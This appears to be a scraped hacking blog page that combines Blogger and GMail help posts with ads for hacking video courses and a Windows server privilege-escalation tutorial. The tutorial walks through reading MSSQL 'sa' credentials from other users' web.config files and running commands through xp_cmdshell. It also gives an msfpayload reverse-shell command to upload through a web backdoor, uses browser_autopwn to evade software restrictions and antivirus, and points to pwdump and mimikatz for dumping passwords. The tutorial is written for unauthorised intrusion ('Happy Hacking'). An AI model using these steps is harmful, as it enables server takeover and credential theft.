Latest News

The Mysterious "Deleted blogs" Dashboard Link

Occasionally, we see signs of confusion, in Blogger Help Forum: Something Is Broken.
Where is the "Deleted blogs" link?
or
How can I recover my blog, if there's no link on the dashboard??
These blog owners don't understand that "Deleted blogs" only appears, when there are deleted blogs that can be recovered.

Not all blogs, having vanishing from the dashboard, will be recoverable by the owner.
  • A blog deleted / locked after hacking activity was detected won't be recoverable.
  • A blog owned under another Blogger account won't be recoverable.
  • A blog that does not exist won't be recoverable.
If the Blogger account owns no blogs that are recoverable, there won't be a "Deleted blogs" link on the dashboard.

If the Blogger account owns other blogs, that are not currently deleted, those blogs will be listed. If the Blogger account owns no recoverable blogs, the blog owner sees a monolithic message
You are not an author on any blogs.

In some cases, the blog owner will be advised to clear cache, cookie, and sessions - then restart the browser, and login to Blogger. In other cases, the solution will be to wait 24 to 48 hours, and check again. Just don't waste time looking for a link that may not be there - and try to understand why the link may not be there.

>> Top

Hacking Windows Servers - Privilege Escalation


Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.

But, these get the job done only on Linux servers. What about windows servers?


Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.
  • Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure.
  • Using meterpreter payload to get a reverse shell over the target machine.
  • Using browser_autopwn. (Really...)
  • Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell-

Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.
If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.
You must be wondering why only "sa"?
Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing login credentials of "sa" account.


Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can login remotely using HeidiSQL
HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.

After logging into MSSQL server with sa account, we get a list of databases and their contents.


Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)

Syntax for the query is-
xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-
xp_cmdshell 'whoami'


This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.
Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
  
2. Meterpreter Payload-

This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.
Using metasploit, generate a reverse shell payload binary.

For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor.
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)
Now it's time to execute the payload.
If everything goes right, we will get a meterpreter session over the target machine as shown below-
We can also use php, asp or other payloads.


3. Browser Autopwn-
This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.
Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.
I think it is clear by now that what I'm trying to explain ;)
We can start Internet Explorer from command line and make it browse to a specific URL.

Syntax for  this-
iexplore.exe [URL]

Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.


4. Using readily available tools-
Tools like pwdump and mimikatz can crack passwords of windows users.

#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper.
The following screenshot shows NTLM hashes from pwdump7:


#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it.
Following picture shows plain text passwords from mimikatz:


You can google about them and learn how to use these tools and what actually they exploit to get the job done for you.

I hope you can now exploit every another windows server.
Happy Hacking :)

About The Author

This article has been written by Deepankar Arora, He is an independent security researcher from India, He has been listed in various hall of fames. 

Certified Ethical Hacking v7 + Other Hacking Videos


CEHv7 provides a comprehensive ethical hacking and network security-training program to meet the standards of highly skilled security professionals.CEH v7 is a revolutionary training program that combines class metrics, advance lab environment, cutting edge hacking techniques and excellent presentation materials.
An ethical hacker is usually employed by an organization who trusts him or her to attempt to penetrate networks and/or computer systems, using the same methods as a hacker, for the purpose of finding and fixing computer security vulnerabilities. Unauthorized hacking (i.e., gaining access to computer systems without prior authorization from the owner) is a crime in most countries, but penetration testing done by request of the owner of the victim system(s) or network(s) is not.
A Certified Ethical Hacker has obtained a certification in how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a hacker.

Price: Rs. 299 + Postal Charge
Language: English
Total Video Files: 40+
Other Accessories: E-Books (20+) + Flash Video (100+) + Hacking Tools (100+)

Chapters:
01 - Certified Ethical Hacker Series Introduction
12 - Malware
02 - Introduction to Certified Ethical Hacking
13 - Hack-O_Rama
03 - VMWare and Linux
14 - Sniffing
04 - Footprinting and Reconnaissance Part 1
15 - Social Engineering
05 - Footprinting and Reconnaissance Part 2
16 - Denial of Service
06 - Scanning Part 1
17 - Session Hijacking
07 - Scanning Part 2
18 - Web and SQL Hacking
08 - Enumeration
19 - Cryptography
09 - Passwords Part 1 Windows
20 - Intrusion Detection Systems
10 - Passwords Part 2 Linux
21 - Hacking Wireless Networks
11 - System Hacking


Additional:
Module 01 - Lab Setup Demos
Module 11 - Session Hijacking
Module 02 - Footprinting and Reconnaissance
Module 12 - Hacking Webservers
Module 03 - Scanning Networks
Module 13 - Hacking Web Applications
Module 04 - Enumeration
Module 14 – (Not Available)
Module 05 - System Hacking
Module 15 - Hacking Wireless Networks
Module 06 - Trojans and Backdoors
Module 16 - Evading IDS, Firewalls, and Honeypots
Module 07 - Viruses and Worms
Module 17 - Buffer Overflow
Module 08 - Sniffers
Module 18 - Cryptography
Module 09 - Social Engineering
Module 19 - Penetration Testing
Module 10 - Denial of Service


How to Purchase :
1. Email Us With The Name of Video Tutorial. Ex - Certified Ethical Hacking v7 + Other Hacking Videos
2. Mail Us Your Full Name, Postal Address and Mobile number.  
3. We will reply you back with our Bank Details as soon as possible.
4. After Depositing Cash at Bank. Please Attach Bank Receipt and Mail Us.
5. After Your Payment Verification we will send you your Video Tutorial by INDIAN SPEED POST and Tracking number will be send through SMS at your Mobile Number. You can Track Your Video Tutorial from http://www.indiapost.gov.in/tracking.aspx .
6. Maximum shipping Time - 7 Days. ( Depends on the Indian Speed Post Service)
7. Contact Us Click Here

Payment Mode:
1. Bank Deposit 
2. Paypal (Coming Soon)

Note - This Tutorial for those who have slow net connection or not able to download due to some reason.
Like it ? Share it.

Unfold Widgets Selectively, Instead Of All At Once

The new Template HTML Editor has been with us for just under 2 weeks.

Not every blog owner sees the new editor as an improvement. Some folks don't understand how to find the code sections, where they need to apply changes - and would probably be happier if "Expand All Widgets" were an option.

Like the old saying goes, you just cannot please everybody.

Fortunately, with this change, it's not difficult to find the code sections that need changing - you just do a little bit of research, before using "Edit HTML".

With the old editor, finding a section that needed changing could be a bit frustrating - though simple, given enough time.
  1. Hit "Expand Widget Templates".
  2. Search for a recognisable section of code.
  3. Try very carefully, to find the right section of code.
  4. Be careful, and don't select the wrong section of code.


With the new editor, you have a bit more work to do - and what you have to do appears to be simply repetitive.
  1. Find a folded code section.
  2. Unfold the section that's folded.
  3. Repeat, until everything is visible.
  4. Search for a recognisable section of code.
  5. Try very carefully, to find the right section of code.
  6. Be careful, and don't select the wrong section of code.

Instead of spending so much time unfolding, searching, and rechecking everything, why not do some research? Figure out what needs changing. Look at the display on the dashboard Layout wizard (previously called "Page Elements"). Identify the widget to be changed, using both the relative position on the page, and the title.

Find the widget id, by looking at the widget to be changed, then at the URL behind the "Edit" link. If you're editing the post template, you'll be looking at "Blog Posts", which has the widgetID of "Blog1". Click here, for instructions on determining the widget id.

Once you have the widgetID, for the specific widget that you need to modify, go to the Template "Edit HTML" wizard, use the "Jump to widget" pull down list, select the widget by widgetID, and there it is. Now, unfold that widget, and do what you have to do.

Isn't that simpler, when you think about it?

>> Top

Computer Hacking Forensic Investigator v4


Computer hacking forensic investigation is the process of detecting hacking attacks and properly extracting evidence to report the crime and conduct audits to prevent future attacks.
Computer forensics is simply the application of computer investigation and analysis techniques in the interests of determining potential legal evidence. Evidence might be sought in a wide range of computer crime or misuse, including but not limited to theft of trade secrets, theft of or destruction of intellectual property, and fraud. Computer forensic investigators can draw on an array of methods for discovering data that resides in a computer system, or recovering deleted, encrypted, or damaged file information.  
Price: Rs. 249 + Postal Charge
Language: English
Total Video Files: 45 +

Chapters:
1. Computer Forensic in Today World
25. (Not available)
2. Computer Forensic Investigation Process
26. Network Forensics and Investigating Logs
3. Searching and Seizing Computers
27. Investigating Network Traffic
4. Digital Evidence
28. Router Forensics
5. First Responder Procedures
29. Investigating Wireless Attacks
6. Incident Handling
30. Investigating Web Attacks
7. Computer Forensics Lab
31. Investigating DoS Attacks
8. Understanding Hard Disk and File Systems
32. (Not available)
9. Digital Media Devices
33. Investigating Internet Crimes
10. CD/DVD Forensics
34. Tracking Emails and Investigating Email Crimes
11. Windows Linux Macintosh Boot Process
35. PDA Forensics
12. Windows Forensics I
36. BlackBerry Forensics
13. Windows Forensics II
37. iPod and iPhone Forensics
14. Linux Forensics
38. Cell Phone Forensics
15. Mac Forensics
39. (Not Available)
16. Data Acquisition and Duplication
40. (Not Available)
17. Recovering Deleted Files and Partitions
41. Investigating Corporate Espionage
18. Forensic Investigation using AccessData FTK
42. (Not Available)
19. Forensic Investigation using EnCase
43. Investigate Trademark and Copyright Infringement
20. Steganography
44. Investigating Sexual Harassment Incidents
21. Image File Forensics
45. Investigating Child Pornography Cases
22. Audio File Forensics
46-49. (Not Available)
23. ( Not Available)
50. Investigative Reports
24. Application Password Crackers
51. Becoming an Expert Witness

How to Purchase :
1. Email Us With The Name of Video Tutorial. Ex - Computer Hacking Forensic Investigator v4
2. Mail Us Your Full Name, Postal Address and Mobile number.  
3. We will reply you back with our Bank Details as soon as possible.
4. After Depositing Cash at Bank. Please Attach Bank Receipt and Mail Us.
5. After Your Payment Verification we will send you your Video Tutorial by INDIAN SPEED POST and Tracking number will be send through SMS at your Mobile Number. You can Track Your Video Tutorial from http://www.indiapost.gov.in/tracking.aspx .
6. Maximum shipping Time - 7 Days. ( Depends on the Indian Speed Post Service)
7. Contact Us Click Here

Payment Mode:
1. Bank Deposit 
2. Paypal (Coming Soon)

Note - This Tutorial for those who have slow net connection or not able to download due to some reason.
Like it ? Share it.

Recovering And Protecting Your GMail Account

Blogger blog owners may have productive action, when their Blogger accounts are successfully hacked through an attack on their GMail accounts.

GMail account owners can get detailed instructions on recovering a successfully hacked account, and on preventing future hacking attacks from being successful. Some of the instructions are specific to GMail use - but overall, Blogger account owners will benefit from their use.

To benefit from the GMail instructions, one should consider the differences between Blogger, email, and Google accounts.

GMail provides instructions for recovering hacked / stolen GMail accounts.

Gmail Account Recovery: Gmail Account Recovery and Security provides complete and detailed instructions for recovering a hacked and stolen GMail email account.

The Recovery instructions include specific mentions of Disabled / Suspended accounts, successfully Stolen accounts, and accounts locked or deleted because of Underage owners.

Accompanying the recovery advice is Gmail help and information: How NOT To Get Hacked. These are instructions for preventing a recurrence of a reported problem. This includes discussion of using a strong and secure password, identifying hacking techniques that involve the account owner, and preventing attacks which are conducted using the computer or network in use by the account owner.

Prevention instructions are similarly focused on GMail account security.

The Prevention instructions, many which are common sense issues to any IT professional or security expert, are specifically written to apply to GMail account owners. There may be additional issues which apply in general, to Blogger accounts - and specifically, to Blogger accounts which are based on non GMail email accounts.

There are a few differences between Blogger blog ownership and GMail account ownership, which will cause issues that cannot be easily resolved by Blogger Support, or by GMail Support, to the satisfaction of the (former) blog owner.

GMail accounts, unlike Blogger accounts, do not contain transferrable assets.

GMail accounts are, by nature, single owner - and ownership of a GMail account is never transferred. In contrast, Blogger blogs can be under team ownership - and ownership can be transferred.
  • Intentional team blog ownership. Team blog ownership can cause problems with loss of blog control, when all known blog administrators (accidentally or intentionally) remove themselves as administrators, leaving an unknown administrator.
  • Intentional transfer of control. A blog owner may assign administrator status to another person, voluntarily - then later regret his decision.
  • Un intentional transfer of control. A blog owner may assign administrator status to another person, voluntarily - and the other person may then remove the former owner administrator status.
  • Ownership theft after account hacking. A hacker, having temporarily gained control of a Blogger account, may transfer ownership of a blog to another Blogger account.
All of these scenarios are regarded as simple transfer of blog ownership, by Blogger Support.

Though maybe not preferred by the (former) blog owner, the blog in question will now be under control of another person. It's possible that some of these scenarios are considered by Google Security, when reviewing Blogger / Google accounts after hacking activity is detected.

Blogger accounts based on non GMail email have typical third party issues.

Blogger accounts, based on non GMail email addresses, will be subject to the typical uncertainty which accompanies any third party service in Blogger. Some details may be involve the email provider, while others will involve Blogger - and arbitrating between the two will be the responsibility of the Blogger account owner.

Owners of Blogger accounts which are based on non GMail email addresses will need to contact the providers of the actual email service, for resolution of some of these issues.

In general though, the GMail Account Loss Prevention and Recovery instructions provide good advice, for any Blogger account owner.

BackTrack and Kali Linux


BackTrack is a security Linux distribution based on the Ubuntu Linux distribution aimed at digital forensics and penetration testing use.In March 2013, the Offensive Security team rebuilt BackTrack around the Debian distribution and released it under the name Kali Linux.
Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewriting BackTrack, their previous forensics Linux distribution.
Price: Rs. 199 + Postal Charge
Language: English
Total Video Files: 45+

Chapters:
1. What is BackTrack
21. Maltego
2. Install BT on a Virtual Machine
22. Metasploit Framework
3. Kali Linux
23. MITM using Wireless Bridging
4. Welcome to the tools of BackTrack and Kali Linux
24. Nmap King of Scanners
5. Bypassing MAC Address Filters
25. Parasite6
6. CDP Flooding
26. PWNing a System with MSF
7. Connecting to the Network
27. Rainbow Tables and Ophcrack
8. Creating a 'Pivot Point'
28. Raspberry Pi & Kali Linux
9. Custom Password Lists
29. Rogue Wireless Access Points
10. Detecting Rootkits
30. Scapy
11. DHCP Starvation
31. Social-Engineer Toolkit (SET)
12. DNS Spoofing
32. Taking over HSRP
13. DTP and 802.1q Attacks
33. Uncovering Hidden SSIDs
14. Ettercap and Xplico
34. Updating SW and Using Integrated Help
15. Hashes and Cracking Passwords
35. Virtual Test Environment
16. Hping3
36. Vote for BT - as the new STP Root Bridge
17. Hydra
37. Burp Suite
18. ARP Spoofing MITM
38. BT Wireless TX Power
19. IPv6 THC Tools
39. Wireless Mis-Association Attacks
20. Breaking WPA2 Wireless
40. Wireshark


How to Purchase :
1. Email Us With The Name of Video Tutorial. Ex - BackTrack and Kali Linux 
2. Mail Us Your Full Name, Postal Address and Mobile number.  
3. We will reply you back with our Bank Details as soon as possible.
4. After Depositing Cash at Bank. Please Attach Bank Receipt and Mail Us.
5. After Your Payment Verification we will send you your Video Tutorial by INDIAN SPEED POST and Tracking number will be send through SMS at your Mobile Number. You can Track Your Video Tutorial from http://www.indiapost.gov.in/tracking.aspx .
6. Maximum shipping Time - 7 Days. ( Depends on the Indian Speed Post Service)
7. Contact Us Click Here

Payment Mode:
1. Bank Deposit 
2. Paypal (Coming Soon)

Note - This Tutorial for those who have slow net connection or not able to download due to some reason.
Like it ? Share it.

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code